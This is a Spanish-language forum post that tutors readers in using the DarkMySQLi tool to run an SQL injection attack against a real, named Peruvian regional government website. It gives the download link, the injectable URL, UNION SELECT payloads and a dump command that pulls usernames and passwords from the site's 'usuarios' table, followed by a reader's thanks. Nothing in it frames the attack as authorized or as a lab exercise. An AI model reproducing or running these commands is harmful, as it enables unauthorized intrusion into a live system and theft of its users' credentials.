(https://4.bp.blogspot.com/-l3jXrhdJBz4/U1FeY5jWboI/AAAAAAAAAwk/MtZs_XOy8DI/s1600/Picture1.png)
DarkMySQLi es una herramienta de código abierto creada en python, que nos permite elaborar un ataque de SQL INJECTION de forma automátizada y extraer la información de las base de datos de una web.
Link de descarga : https://www.mediafire.com/?72fcrfb2mzy16mc (https://www.mediafire.com/?72fcrfb2mzy16mc)
Vamos a la acción
(https://1.bp.blogspot.com/-XviX1U-rG7o/U1Fc_50XDuI/AAAAAAAAAwY/F8pGejshm9c/s1600/Sin+t%C3%ADtulo.png)
El primer paso que haremos primero sera encontrar la web vulnerable en este caso utilizare la siguiente :
http://www.regionsanmartin.gob.pe/institucional/ini.php?Area='3
Ejecutaremos el siguiente comando para el testeo de la web :
python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3" --findcol
(https://2.bp.blogspot.com/-zi72hTu5iZc/U1bhCnzq6ZI/AAAAAAAAAyM/fRkwJnyY9r8/s1600/Sin+t%C3%ADtulo.png)
como vemos nos voto la información principal para saber si es vulnerable a la Inyección DarkMySQLi :
[!] darkMySQLi URL: http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de--
luego que sabemos que es vulnerable a la inyección pondremos el siguiente:
python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+1,2,darkc0de,4--" --full
(solo reemplazamos el numero " 3 " por " darkc0de "
(https://4.bp.blogspot.com/-MzMnOLv5pNQ/U1bjeZxYuPI/AAAAAAAAAyY/TlFu7U-4Z9E/s1600/Sin+t%C3%ADtulo.png)
(https://1.bp.blogspot.com/-ZtUIq4WX53s/U1bj7iguOfI/AAAAAAAAAyg/4G718pL-jso/s1600/Sin+t%C3%ADtulo.png)
Como vemos nos a votado las columnas de las base de datos clasificándolas por cada uno de ellas en sus respectivas "tablas" de manera que podamos identificarlos fácilmente los datos almacenados.
Lo que haremos a continuación sera dumpear las columnas de los usuarios:
python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+1,2,darkc0de,4--" --dump -D regionsanmartin_gob_pe -T usuarios -C nomb_usuario,pass,tipo_usuario
(https://1.bp.blogspot.com/-1Y3wdikQN9I/U1bnOZXMJdI/AAAAAAAAAys/BqLN2Tk_Jjo/s1600/Sin+t%C3%ADtulo.png)
Imagen completa de usuarios
(https://3.bp.blogspot.com/-wE_rbMP9OJ0/U1bnrspzaMI/AAAAAAAAAy0/uUrcpcRLXvU/s1600/Sin+t%C3%ADtulo.png)
Espero les aya gustado mucho el Post, un saludo y un abrazo desde PERU"
Gracias Browsernet me encantan leer tus entradas, es bueno tener alternativas para este tipo de ataques, saludos hasta Perú desde México
Enviado desde mi HTC One mediante Tapatalk